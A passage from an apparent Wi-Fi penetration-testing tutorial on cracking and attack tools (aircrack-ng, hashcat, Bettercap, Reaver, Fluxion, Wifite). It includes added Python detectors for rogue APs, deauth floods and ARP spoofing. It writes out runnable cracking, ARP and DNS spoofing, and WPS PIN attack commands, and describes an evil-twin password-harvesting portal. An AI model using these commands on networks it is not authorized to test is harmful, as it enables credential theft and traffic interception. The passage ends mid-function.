WHAT AIRCRACK DOES FOR EACH CANDIDATE PASSWORD:
  1. PMK = PBKDF2(HMAC-SHA1, candidate, SSID, 4096, 256)
  2. PTK = PRF-512(PMK, nonces, MAC addresses)
  3. MIC = HMAC(KCK extracted from PTK, EAPOL_frame_data)
  4. Compare computed MIC with MIC captured in handshake
  5. Match → password found. No match → next word.
SPEED REALITY CHECK:
  aircrack-ng (CPU only) ≈ 1,000 – 8,000 keys/second
  For 14 million word rockyou.txt: 30 minutes worst case
  Against passwords NOT in any wordlist: never succeeds
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

aircrack-ng for WEP uses a completely different algorithm. It performs the statistical PTW/FMS/Korek attacks against collected IVs. Given ~85,000 data frames (achievable in minutes on any active WEP network), it recovers the WEP key in under ten seconds.

Tool 2: Hashcat — GPU-Accelerated Cracking

aircrack-ng runs on the CPU and is relatively slow for WPA2 cracking. Hashcat runs on the GPU, taking advantage of the massively parallel architecture of modern graphics cards to test candidates orders of magnitude faster.

SPEED COMPARISON: CPU vs GPU (WPA2 cracking)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Hardware                      │ Keys/Second
──────────────────────────────┼─────────────────
CPU (aircrack-ng)             │ ~1,000 – 8,000
Mid-range GPU (RTX 3060)      │ ~400,000
High-end GPU (RTX 4090)       │ ~1,200,000
4× RTX 4090 rig               │ ~4,800,000
Cloud GPU cluster (8× A100)   │ ~8,000,000+
REALITY CHECK:
At 1,200,000 keys/sec against rockyou.txt (14M words):
→ 14,000,000 ÷ 1,200,000 = ~12 seconds to test the entire list
At 1,200,000 keys/sec against 8-character lowercase brute force:
→ 26^8 = 208 billion combinations
→ 208,000,000,000 ÷ 1,200,000 ≈ 48 hours
→ A 12-char random password: millions of years
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
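Step 1 of the aircrack-ng candidate loop and the speed arithmetic in this table are the two numbers that decide whether a given passphrase survives. The added example below (written for this article, not code from aircrack-ng or hashcat) computes the PMK exactly as WPA2-Personal defines it, checked against the published test vector from IEEE 802.11i Annex H (passphrase "password", SSID "IEEE"), and then does the policy arithmetic from the table: for a proposed passphrase, how large is the smallest mask that covers it, and how long would exhausting that mask take at the 1,200,000 keys/second figure given above. The rate and the 100-year horizon are assumptions you can change.

```python
import hashlib
import string

PBKDF2_ITERATIONS = 4096   # fixed by WPA2-Personal; this is the per-candidate cost
PMK_BYTES = 32             # 256-bit PMK

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Step 1 of the candidate loop:
    PMK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096 iterations, 256 bits).
    The SSID is the salt, so a precomputed table only ever applies to one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_BYTES)

def keyspace_size(password: str) -> int:
    """Size of the smallest mask that covers this password: same length, drawn
    only from the character classes it actually uses (?l ?u ?d ?s)."""
    alphabet = 0
    if any(c in string.ascii_lowercase for c in password):
        alphabet += 26
    if any(c in string.ascii_uppercase for c in password):
        alphabet += 26
    if any(c in string.digits for c in password):
        alphabet += 10
    if any(c in string.punctuation for c in password):
        alphabet += len(string.punctuation)   # 32 symbols
    return alphabet ** len(password)

def seconds_to_exhaust(keyspace: int, keys_per_second: float) -> float:
    """Worst-case time to test every candidate in the mask at a given rate."""
    return keyspace / keys_per_second

def survives_mask_attack(password: str, keys_per_second: float = 1_200_000,
                         horizon_years: float = 100.0) -> bool:
    """Policy check: would exhausting the mask at this rate (default: the
    single RTX 4090 figure in the table above) outlast the horizon?
    A dictionary word passes this check and still falls in seconds, so it is
    a necessary condition, not a sufficient one."""
    return seconds_to_exhaust(keyspace_size(password), keys_per_second) > horizon_years * 365.25 * 86400

if __name__ == "__main__":
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    for pw in ["abcdefgh", "Xq7#mL2$vB9!"]:  # constructed examples
        hours = seconds_to_exhaust(keyspace_size(pw), 1_200_000) / 3600
        print(f"{pw!r}: {keyspace_size(pw):.3e} candidates, {hours:.3g} hours, "
              f"survives={survives_mask_attack(pw)}")
```

Running it reproduces the table's figures: 26^8 lowercase candidates take roughly 48 hours at 1.2 million keys per second, while a 12-character mixed-class passphrase pushes the mask past anything a GPU rig will finish. Python's PBKDF2 is many times slower than hashcat's, which is the point of Section 2's speed table, not a defect in the derivation.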

Using Hashcat for WPA2:

# Step 1: Convert the airodump-ng capture to Hashcat's 22000 format
#         (hcxpcapngtool reads the .cap written by airodump-ng -w, as well as .pcap/.pcapng)
hcxpcapngtool -o hash.hc22000 capture-01.cap
# Step 2: Run dictionary attack
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
# Step 3: Add mutation rules (dramatically improves coverage)
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Step 4: Targeted brute force with a mask
# Test every 8-char candidate of the form: four lowercase letters followed by four digits
hashcat -m 22000 hash.hc22000 -a 3 ?l?l?l?l?d?d?d?d
# -m 22000  → hash type (WPA2-PMKID/EAPOL combined format)
# -a 3      → brute force (mask) mode
# ?l        → any lowercase letter
# ?d        → any digit

Hashcat attack modes — explained simply:

HASHCAT ATTACK MODES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
MODE 0 — Straight Dictionary
  Tests each word from the wordlist exactly as-is.
  Fast. Good for common passwords in the list.
  Misses: "Password1" if wordlist has "password1"
MODE 1 — Combination
  Joins every word from List A with every word from List B.
  Example: "dog" + "2024" → tests "dog2024"
  Good for: pattern-based passwords
MODE 3 — Brute Force with Mask
  Tests every possible combination of defined character sets.
  ?u = uppercase, ?l = lowercase, ?d = digit, ?s = symbol
  Example: -a 3 ?u?l?l?l?d?d → "Pass12", "Word99"
  Slow for long passwords. Effective for short, structured ones.
MODE 6 — Hybrid: Dictionary + Mask
  Every word from list, combined with a suffix mask.
  Example: "password" + "?d?d?d?d" → "password2024"
  Extremely effective for human-chosen passwords.
RULES (most powerful method)
  Apply transformation rules to every dictionary word.
  Rules include: capitalize first letter, append a year,
  leet substitutions (a→@, e→3), reverse, duplicate, etc.
  best64.rule + rockyou.txt = billions of realistic candidates
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Tool 3: Wireshark — The Protocol Microscope

Wireshark is the world's most widely used network protocol analyzer. Where airodump-ng is a blunt capture instrument, Wireshark is a microscope. You use it after capture to examine the exact structure and content of specific frames.

WIRESHARK DISPLAY FILTERS FOR WIRELESS WORK
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
FILTER                              │ SHOWS
────────────────────────────────────┼──────────────────────────
wlan.fc.type_subtype == 0x08        │ Beacon frames only
wlan.fc.type_subtype == 0x04        │ Probe Request frames
wlan.fc.type_subtype == 0x05        │ Probe Response frames
wlan.fc.type_subtype == 0x0c        │ Deauthentication frames
wlan.fc.type_subtype == 0x0a        │ Disassociation frames
eapol                               │ WPA handshake frames only
wlan.bssid == AA:BB:CC:DD:EE:FF     │ Only target AP traffic
wlan.sa == 11:22:33:44:55:66        │ Only specific client traffic
wlan.fc.type_subtype == 0x08 &&     │ Beacons with hidden SSID
  wlan.ssid == ""                   │ (length 0 = hidden)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Key uses in wireless security work:

Handshake verification: Before spending hours cracking, verify the capture file actually contains a valid, complete handshake. Filter by eapol and check that you see at least EAPOL messages 1 and 2 (ideally all four). An incomplete handshake will never crack successfully.

Rogue AP investigation: Filter beacon frames and look for unexpected BSSIDs broadcasting your organization's SSID. Examine the RSN IE (Robust Security Network Information Element) in the beacon to see the advertised security capabilities.
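An added example, not code from the post, for the RSN IE check this paragraph describes: the parser decodes the cipher suites, AKM suites and MFP capability bits from the raw element bytes, and an allowlist comparison flags beacons that come from an unknown BSSID or advertise weaker security than expected. The SSID, BSSIDs and inventory are assumed values.

```python
# Cipher and AKM suite selectors (OUI 00-0F-AC + type byte) as defined in
# IEEE 802.11; only the values relevant to Wi-Fi audits are listed.
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104",
           8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
AKMS = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK", 8: "SAE",
        9: "FT-SAE", 18: "OWE"}
IEEE_OUI = b"\x00\x0f\xac"

def _suite(table, raw):
    """Translate a 4-byte suite selector into a name."""
    if raw[:3] != IEEE_OUI:
        return f"vendor({raw.hex()})"
    return table.get(raw[3], f"unknown({raw[3]})")

def parse_rsn_ie(ie: bytes) -> dict:
    """Parse an RSN IE (element ID 48) taken from a beacon's tagged parameters."""
    if len(ie) < 2 or ie[0] != 48:
        raise ValueError("not an RSN information element")
    body = ie[2:2 + ie[1]]
    version = int.from_bytes(body[0:2], "little")
    group = _suite(CIPHERS, body[2:6])
    pos = 6
    n_pair = int.from_bytes(body[pos:pos + 2], "little")
    pos += 2
    pairwise = [_suite(CIPHERS, body[pos + 4 * i:pos + 4 * i + 4]) for i in range(n_pair)]
    pos += 4 * n_pair
    n_akm = int.from_bytes(body[pos:pos + 2], "little")
    pos += 2
    akm = [_suite(AKMS, body[pos + 4 * i:pos + 4 * i + 4]) for i in range(n_akm)]
    pos += 4 * n_akm
    # RSN Capabilities: bit 6 = MFP required (MFPR), bit 7 = MFP capable (MFPC)
    caps = int.from_bytes(body[pos:pos + 2], "little") if len(body) >= pos + 2 else 0
    return {"version": version, "group": group, "pairwise": pairwise, "akm": akm,
            "mfp_capable": bool(caps & 0x80), "mfp_required": bool(caps & 0x40)}

def beacon_findings(observed, known_aps, expected_akm="SAE"):
    """
    observed: (ssid, bssid, rsn_ie_bytes) tuples pulled from beacon frames.
    known_aps: {ssid: set_of_legitimate_bssids} (assumed inventory, not from the post).
    Returns findings for unknown BSSIDs and for APs advertising weaker security.
    """
    findings = []
    for ssid, bssid, ie in observed:
        if ssid not in known_aps:
            continue  # not one of ours; out of scope for the rogue-AP check
        rsn = parse_rsn_ie(ie)
        if bssid not in known_aps[ssid]:
            findings.append(f"{ssid}: unknown BSSID {bssid} advertising AKM {rsn['akm']}")
        if expected_akm not in rsn["akm"]:
            findings.append(f"{ssid}: {bssid} offers {rsn['akm']} instead of {expected_akm}")
        if "TKIP" in rsn["pairwise"] or rsn["group"] == "TKIP":
            findings.append(f"{ssid}: {bssid} still allows TKIP")
    return findings

# Constructed sample IEs (the RSN tag bytes as Wireshark would show them):
WPA2_PSK_CCMP = bytes.fromhex("3014 0100 000fac04 0100 000fac04 0100 000fac02 0c00")
WPA3_SAE_MFPR = bytes.fromhex("3014 0100 000fac04 0100 000fac04 0100 000fac08 c000")

KNOWN = {"CorpWiFi": {"aa:bb:cc:dd:ee:ff"}}                     # assumed inventory
OBSERVED = [("CorpWiFi", "aa:bb:cc:dd:ee:ff", WPA3_SAE_MFPR),   # legitimate AP
            ("CorpWiFi", "11:22:33:44:55:66", WPA2_PSK_CCMP)]   # twin on an unknown BSSID

if __name__ == "__main__":
    for line in beacon_findings(OBSERVED, KNOWN):
        print(line)
```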

Deauth attack evidence: In a forensic context, filter wlan.fc.type_subtype == 0x0c and look for unusual volumes of Deauthentication frames — this is a clear indicator of an active attack.

Probe request analysis: Filter wlan.fc.type_subtype == 0x04 to see all probe requests and identify which devices are searching for which saved networks.

Wireshark can open the capture files airodump-ng writes, or capture directly from a live monitor-mode interface. For analysis of existing capture files, always use Wireshark rather than airodump-ng.
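As an added example (not from the original post), this is the type/subtype decoding behind the wlan.fc.type_subtype filters above, applied as a deauthentication-flood detector over constructed frames. The window and threshold values are assumptions to tune against your own baseline.

```python
from collections import defaultdict

# Wireshark's wlan.fc.type_subtype is (type << 4) | subtype, both taken
# from the first byte of the 802.11 Frame Control field.
SUBTYPE_NAMES = {0x04: "Probe Request", 0x05: "Probe Response", 0x08: "Beacon",
                 0x0a: "Disassociation", 0x0c: "Deauthentication"}

def fc_type_subtype(frame: bytes) -> int:
    """Return the combined type/subtype code of a raw 802.11 frame."""
    fc0 = frame[0]                 # bits 0-1 version, 2-3 type, 4-7 subtype
    return (((fc0 >> 2) & 0x3) << 4) | ((fc0 >> 4) & 0xF)

def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def mgmt_addresses(frame: bytes):
    """Management frames: addr1 = DA, addr2 = SA, addr3 = BSSID (bytes 4-21)."""
    return _mac(frame[4:10]), _mac(frame[10:16]), _mac(frame[16:22])

def deauth_flood_sources(frames, window_s=10.0, threshold=20):
    """
    frames: (timestamp, raw_frame) pairs as a monitor-mode sniffer yields them.
    Returns {bssid: total_deauths} for every BSSID whose deauth count exceeds
    `threshold` within any sliding window of `window_s` seconds (assumed
    thresholds; tune to your environment's baseline).
    """
    per_bssid = defaultdict(list)
    for ts, frame in frames:
        if fc_type_subtype(frame) == 0x0c:
            per_bssid[mgmt_addresses(frame)[2]].append(ts)
    flagged = {}
    for bssid, times in per_bssid.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window_s:
                start += 1
            if end - start + 1 > threshold:
                flagged[bssid] = len(times)
                break
    return flagged

def make_mgmt_frame(type_subtype, da, sa, bssid, body=b""):
    """Build a minimal management frame for the constructed sample below."""
    ftype, subtype = type_subtype >> 4, type_subtype & 0xF
    fc = bytes([(subtype << 4) | (ftype << 2), 0x00])
    hdr = fc + b"\x00\x00"                         # duration/ID
    for mac in (da, sa, bssid):
        hdr += bytes.fromhex(mac.replace(":", ""))
    return hdr + b"\x00\x00" + body                # sequence control + body

# Constructed sample: 5 s of normal beacons, then 40 broadcast deauths in 2 s
AP, BCAST = "aa:bb:cc:dd:ee:ff", "ff:ff:ff:ff:ff:ff"
SAMPLE = [(t * 0.1, make_mgmt_frame(0x08, BCAST, AP, AP)) for t in range(50)]
SAMPLE += [(5.0 + i * 0.05, make_mgmt_frame(0x0c, BCAST, AP, AP, b"\x07\x00"))
           for i in range(40)]

if __name__ == "__main__":
    for ts, frame in SAMPLE[48:52]:
        print(f"{ts:5.2f}s {SUBTYPE_NAMES.get(fc_type_subtype(frame))}")
    print("deauth flood from:", deauth_flood_sources(SAMPLE))
```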

Tool 4: Bettercap — The Post-Access Swiss Army Knife

Bettercap is where wireless attacks end and post-access attacks begin. Once you are on a network — either through a cracked WPA2 password or through an Evil Twin — Bettercap handles everything that happens next.

It operates as a unified framework with modules for different attack capabilities:

BETTERCAP CORE MODULES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
wifi module
  wifi.recon on          → scan for nearby APs and clients
  wifi.deauth [bssid]    → send deauth to AP or specific client
  wifi.show              → display all discovered networks
arp.spoof (Man-in-the-Middle positioning)
  set arp.spoof.targets 192.168.1.50    → target specific victim
  arp.spoof on                          → begin poisoning
  WHAT HAPPENS: Bettercap sends fake ARP replies to the victim
  ("192.168.1.1 is at MY MAC") and to the router ("192.168.1.50
  is at MY MAC"). All traffic between victim and router now flows
  through the attacker's machine.
net.sniff (Traffic capture and analysis)
  net.sniff on           → capture and display all passing traffic
  set net.sniff.verbose true → show full HTTP data
  With arp.spoof active, this captures all unencrypted victim traffic.
dns.spoof (DNS hijacking)
  set dns.spoof.domains bank.com, google.com
  set dns.spoof.address 192.168.1.99   → attacker's server IP
  dns.spoof on
  Any DNS query for targeted domains returns attacker's IP.
  Victim's browser goes to attacker's server instead.
https.proxy (SSL stripping)
  https.proxy on
  Attempts to downgrade HTTPS connections to HTTP
  for sites without HSTS properly configured.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
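Defensive counterpart to the arp.spoof behaviour described in the table, added here and not part of Bettercap or the post: parse ARP replies and alert when one IP is claimed by more than one MAC, with the gateway called out separately because that is the address poisoning rewrites. All addresses and packets are constructed inside the script; nothing is sent.

```python
import struct
import ipaddress
from collections import defaultdict

def _mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def parse_arp(pkt: bytes):
    """Decode a 28-byte Ethernet/IPv4 ARP payload into its fields."""
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", pkt[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    return {
        "op": oper,                                         # 1 = request, 2 = reply
        "sender_mac": _mac_str(pkt[8:14]),
        "sender_ip": str(ipaddress.IPv4Address(pkt[14:18])),
        "target_mac": _mac_str(pkt[18:24]),
        "target_ip": str(ipaddress.IPv4Address(pkt[24:28])),
    }

def detect_arp_spoofing(packets, gateway_ip):
    """
    packets: (timestamp, raw_arp_payload) pairs captured on the LAN.
    Alerts when one IP is claimed by more than one MAC in ARP replies, which
    is exactly what the "192.168.1.1 is at MY MAC" poisoning above produces.
    The gateway is labelled separately because it is the usual MitM target.
    """
    claims = defaultdict(dict)          # ip -> {mac: first_seen}
    alerts = []
    for ts, pkt in packets:
        arp = parse_arp(pkt)
        if arp["op"] != 2:
            continue
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        if mac not in claims[ip]:
            claims[ip][mac] = ts
            if len(claims[ip]) > 1:
                kind = "GATEWAY" if ip == gateway_ip else "host"
                alerts.append((ts, kind, ip, sorted(claims[ip])))
    return alerts

def arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Constructed test data: an ARP is-at (opcode 2) payload, never sent."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    return (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
            + mac(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
            + mac(target_mac) + ipaddress.IPv4Address(target_ip).packed)

# Constructed LAN: router, victim, and a third MAC that later claims both IPs
GATEWAY, VICTIM = "192.168.1.1", "192.168.1.50"
ROUTER_MAC, VICTIM_MAC, THIRD_MAC = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:50", "cc:cc:cc:cc:cc:99"
SAMPLE = [
    (0.0, arp_reply(ROUTER_MAC, GATEWAY, VICTIM_MAC, VICTIM)),   # normal gateway reply
    (1.0, arp_reply(VICTIM_MAC, VICTIM, ROUTER_MAC, GATEWAY)),   # normal host reply
    (2.0, arp_reply(THIRD_MAC, GATEWAY, VICTIM_MAC, VICTIM)),    # "gateway is at THIRD_MAC"
    (2.1, arp_reply(THIRD_MAC, VICTIM, ROUTER_MAC, GATEWAY)),    # "victim is at THIRD_MAC"
]

if __name__ == "__main__":
    for ts, kind, ip, macs in detect_arp_spoofing(SAMPLE, GATEWAY):
        print(f"[{ts:.1f}s] {kind} {ip} claimed by {macs}")
```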

Running Bettercap:

sudo bettercap -iface wlan0mon    # launch on wireless interface
# Bettercap opens an interactive REPL (Read-Eval-Print Loop)
# Commands are entered interactively:
>> help                 # list all modules
>> wifi.recon on        # begin wireless scanning
>> wifi.show            # display discovered networks
>> arp.spoof on         # begin ARP poisoning (after connecting)

Bettercap is particularly powerful because it combines wireless reconnaissance, active attacks, and post-connection exploitation in a single unified tool. Many red team workflows use airodump-ng for initial capture and Bettercap for everything after network access is gained.

Tool 5: Reaver — Exploiting the WPS Vulnerability

Reaver targets WPS (Wi-Fi Protected Setup), a feature designed to make connecting devices to Wi-Fi easier by using an 8-digit PIN instead of the full password.

The WPS PIN vulnerability is elegant in its simplicity: the 8-digit PIN is validated in two separate halves. The router validates the first 4 digits, and only if they are correct does it validate the last 3 (the 8th digit is a checksum). This splits the attack:

WPS PIN ATTACK — WHY IT WORKS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
FULL 8-DIGIT PIN:
  Possible combinations: 10^8 = 100,000,000
  At 1 attempt/second: 100,000,000 seconds ≈ 3 years
ACTUAL VALIDATION STRUCTURE:
  PIN is validated in TWO halves:
  [1234] [5670]   ← last digit is always a checksum
    ↓       ↓
  10^4 = 10,000   10^3 = 1,000   (last digit auto-computed)
  First half: max 10,000 attempts
  Second half: max 1,000 attempts
  TOTAL: max 11,000 attempts
  At 1 attempt/second: ≈ 3 hours
RESULT: Once PIN is found → WPA passphrase is retrieved.
  WPA passphrase can be 63 random characters.
  Doesn't matter. Reaver gets it from the PIN, not the password.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Basic Reaver usage
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# With delay to avoid lockout
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 1 --lock-delay 30
# -vv     → verbose output
# -d 1    → 1 second delay between attempts
# --lock-delay 30 → wait 30 seconds when lockout is detected

Many modern routers implement WPS lockout after several failed attempts, which slows Reaver dramatically. However, many older routers and firmware versions have no lockout mechanism at all.

The single most important takeaway: No matter how strong your WPA2 password is, if WPS is enabled on a router without a robust lockout, Reaver will eventually retrieve that password. WPS must be disabled.
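The arithmetic in the table, carried through as an added example that is not from the post: the checksum rule that makes the eighth digit free, the 11,000 worst-case count, and how a lockout pause (an assumed, simplified lockout model) stretches the time needed to exhaust the PIN space.

```python
def wps_checksum_digit(first7: str) -> int:
    """
    Eighth WPS PIN digit, computed from the first seven as the WPS
    specification defines it: digits 1,3,5,7 weighted 3, digits 2,4,6 weighted 1.
    """
    d = [int(c) for c in first7]
    accum = 3 * (d[0] + d[2] + d[4] + d[6]) + (d[1] + d[3] + d[5])
    return (10 - accum % 10) % 10

def pin_checksum_ok(pin: str) -> bool:
    """True if an 8-digit PIN carries a valid checksum digit."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum_digit(pin[:7])

def worst_case_attempts(split_validation: bool = True) -> int:
    """Keyspace under the two models in the table: 10^8 flat, 10^4 + 10^3 split."""
    return 10 ** 4 + 10 ** 3 if split_validation else 10 ** 8

def worst_case_hours(rate_per_s=1.0, lockout_after=None, lockout_s=0.0,
                     split_validation=True) -> float:
    """
    Hours to exhaust the keyspace at `rate_per_s` attempts per second. If the
    AP locks WPS for `lockout_s` seconds after every `lockout_after` failures,
    those pauses are added in; this quantifies the lockout mitigation the text
    mentions (assumed, simplified lockout model).
    """
    attempts = worst_case_attempts(split_validation)
    seconds = attempts / rate_per_s
    if lockout_after:
        seconds += (attempts // lockout_after) * lockout_s
    return seconds / 3600

if __name__ == "__main__":
    print("12345670 checksum valid:", pin_checksum_ok("12345670"))
    print("flat keyspace:", round(worst_case_hours(split_validation=False) / 24 / 365, 2), "years")
    print("split keyspace:", round(worst_case_hours(), 2), "hours")
    print("with 60 s lockout every 3 failures:",
          round(worst_case_hours(lockout_after=3, lockout_s=60), 1), "hours")
```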

Tool 6: Bully — The Reaver Alternative

Bully performs the same WPS PIN attack as Reaver but with a separate C implementation, which makes it more reliable against specific router firmware implementations that cause Reaver to stall or produce incorrect results.

sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF -v 3

Some penetration testers keep both Reaver and Bully available — if one stalls on a particular router model, the other may work more cleanly. The underlying attack and vulnerability are identical.

Tool 7: Fluxion — The Automated Evil Twin Framework

Fluxion automates the full Evil Twin attack workflow into a user-friendly menu-driven interface. It handles everything from initial scanning to password extraction.

FLUXION ATTACK SEQUENCE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
PHASE 1: SCAN
  → User selects target SSID/BSSID from scan results
  → Fluxion captures WPA2 handshake from target AP
PHASE 2: EVIL TWIN SETUP
  → Fluxion creates AP with identical SSID
  → Configures hostapd to run the rogue AP
  → Sets up DHCP server for client addresses
  → Configures iptables for traffic routing
PHASE 3: DEAUTHENTICATION
  → Continuous deauth attack against legitimate AP
  → Target clients disconnect, see both APs with same SSID
  → Victims connect to Evil Twin (usually stronger signal)
PHASE 4: CAPTIVE PORTAL
  → All victim traffic redirected to fake router page
  → Page says: "Your router requires a firmware update.
    Please re-enter your Wi-Fi password to continue."
  → Social engineering makes this plausible to most users
PHASE 5: PASSWORD VERIFICATION
  → User submits password in captive portal
  → Fluxion runs aircrack-ng against captured handshake
  → If password is correct: SUCCESS. Attacker gets password.
  → If password is wrong: "Incorrect password. Try again."
    (Victim tries again, unaware they're being harvested)
PHASE 6: CLEANUP
  → Fluxion stops everything when correct password is found
  → Saves credentials
  → Restores network environment
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

The critical strength of Fluxion over pure offline cracking: it defeats strong passwords. If the WPA2 passphrase is "7x!Kq@M2#nPv$8" — a 14-character random string that would take millions of years to brute-force — Fluxion still retrieves it, because it tricks the user into typing it voluntarily. The attack is against the human, not the cryptography.

This is why user security awareness training is as important as technical hardening.

Tool 8: Wifite2 — The Automated Workflow Manager

Wifite2 is an automated wireless auditing tool. Where individual Aircrack-ng tools require manual orchestration, Wifite handles everything automatically: scanning, target selection, handshake capture, PMKID harvesting, WPS attacks, and cracking.

# Basic automated scan and attack
sudo wifite
# Target only WPS-enabled networks
sudo wifite --wps
# Use specific wordlist for cracking
sudo wifite --dict /usr/share/wordlists/rockyou.txt
# Target specific BSSID
sudo wifite --bssid AA:BB:CC:DD:EE:FF

Wifite2 is excellent for efficiently running through multiple targets in an authorized engagement. However — and this is important — you should understand every individual tool that Wifite calls before using Wifite. Automated tools fail in unexpected ways, and you cannot troubleshoot them if you do not understand their components. Use Wifite for efficiency once you have mastered the underlying tools.

Tool 9: Kismet — The Wireless Intelligence Platform

Kismet is different from every other tool on this list. It is not an attack tool — it is a comprehensive wireless monitoring, detection, and logging platform.

WHAT KISMET DOES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
PASSIVE DETECTION:
  → Discovers all 802.11 networks including hidden SSIDs
  → Logs all access points, clients, and their relationships
  → Tracks device history over time
  → Captures and logs all beacon, probe, and data frames
ATTACK DETECTION:
  → Identifies deauthentication floods
  → Detects rogue access points
  → Flags suspicious management frame patterns
  → Alerts on known attack signatures
MULTI-PROTOCOL:
  → Bluetooth scanning (with compatible hardware)
  → Zigbee detection
  → Z-Wave detection
  → Other RF protocols via software-defined radio
REPORTING:
  → Web-based dashboard (modern Kismet uses a web UI)
  → GPS integration for location-based mapping
  → Long-term logging for forensic analysis
  → Export to JSON, SQL, and other formats
INSTALLATION AND RUN:
  sudo apt install kismet
  sudo kismet -c wlan0mon
  → Access web UI at http://localhost:2501
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Kismet is used both by defenders (as a WIDS sensor monitoring for attacks) and by attackers during extended reconnaissance operations (silently mapping a target environment's entire wireless landscape over days or weeks). It is the most capable passive wireless monitoring tool available.

Section 3: Hardware — Why Your Laptop Wi-Fi Card Is Useless

This is a section that trips up nearly every beginner. You install Kali Linux, you try to enable monitor mode on your laptop's built-in wireless card, and nothing works. Here is why — and exactly what you need instead.

Why Built-In Laptop Wi-Fi Does Not Work

Your laptop's built-in Wi-Fi adapter is designed and optimized for exactly one thing: connecting your laptop to a wireless network and transferring data efficiently. The manufacturer's driver exposes the minimum functionality required for this purpose.

There are three specific problems:

1. No Monitor Mode Support in Drivers: Even if the chipset is physically capable of receiving arbitrary frames, the Windows, macOS, or Linux driver provided by the manufacturer does not expose this capability. Enabling monitor mode requires a driver that implements the mac80211 Linux wireless subsystem's monitor mode interface. Most built-in adapter drivers do not implement this.

2. No Packet Injection Support: Injecting arbitrary 802.11 frames requires the driver to pass raw frame data directly to the hardware's transmit queue, bypassing the normal connection management logic. Manufacturer drivers do not implement this.

3. Chipset and Firmware Restrictions: Some chips — particularly Intel and Broadcom, which dominate the laptop market — have firmware that actively prevents monitor mode and injection regardless of driver implementation.

BUILT-IN vs EXTERNAL ADAPTER
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Capability          │ Built-in Laptop  │ Alfa AWUS036NHA
                    │ (Intel/Broadcom) │ (Atheros AR9271)
────────────────────┼──────────────────┼────────────────────
Connect to network  │      ✓           │      ✓
Monitor mode        │      ✗           │      ✓
Packet injection    │      ✗           │      ✓
Channel locking     │      ✗           │      ✓
Capture handshakes  │      ✗           │      ✓
Works on 5GHz       │      ✓ (2.4+5)  │  ✗ (2.4GHz only)
External antenna    │      ✗           │  ✓ (RP-SMA)
USB connection      │    N/A           │      ✓
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
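An added check (not from the post) for the driver-level claim above: parse the output of iw list and report which phys advertise monitor mode among their interface modes, which is what airmon-ng needs in order to create a monitor interface. The sample output is constructed; live_check() runs the real command on a Linux host with iw installed. Injection support is not visible in this output.

```python
import re
import subprocess

def parse_iw_list(text: str) -> dict:
    """
    Parse `iw list` output into {phy_name: set_of_interface_modes}, taking
    both the "Supported interface modes" and the "software interface modes"
    sections (the latter can always be added by mac80211).
    """
    phys, current, in_modes = {}, None, False
    for line in text.splitlines():
        m = re.match(r"^Wiphy (\S+)", line)
        if m:
            current, in_modes = m.group(1), False
            phys[current] = set()
            continue
        stripped = line.strip()
        if re.match(r"^(Supported|software) interface modes", stripped):
            in_modes = True
            continue
        if in_modes:
            if stripped.startswith("* "):
                phys[current].add(stripped[2:].strip())
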